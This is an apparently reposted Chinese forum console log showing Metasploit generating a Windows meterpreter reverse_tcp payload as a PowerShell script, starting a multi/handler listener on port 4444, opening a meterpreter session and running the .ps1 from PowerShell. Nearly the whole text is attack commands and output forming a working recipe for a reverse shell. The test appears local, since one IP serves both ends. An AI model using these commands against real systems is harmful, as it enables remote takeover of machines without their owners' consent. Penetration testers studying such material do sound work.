Metasploit and PowerShell payloads

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 969 exploits - 511 auxiliary - 155 post
+ -- --=[ 261 payloads - 28 encoders - 8 nops

msf > use windows/meterpreter/reverse_tcp
msf  payload(reverse_tcp) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  payload(reverse_tcp) > generate -t psh -f pwShell.ps1
[*] Writing 2909 bytes to pwShell.ps1...
msf  payload(reverse_tcp) > use multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST     172.24.24.41     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started reverse handler on 172.24.24.41:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 172.24.24.41
[*] Meterpreter session 1 opened (172.24.24.41:4444 -> 172.24.24.41:26520) at 2012-10-10 17:09:30 +0800

meterpreter > getpid
Current pid: 5708
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1


C:\Users\Administrator>powershell -File c:\metasploit\msf3\pwShell.ps1
35520512
酱紫经常会卡住 最好酱紫


Windows PowerShell
版权所有 (C) 2012 Microsoft Corporation。保留所有权利。

PS C:\Users\Administrator> cd C:\metasploit\msf3
PS C:\metasploit\msf3> .\pwShell.ps1
73662464
73662465
73662466
73662467
73662468
73662469 

转自：http://zone.wooyun.org/content/1261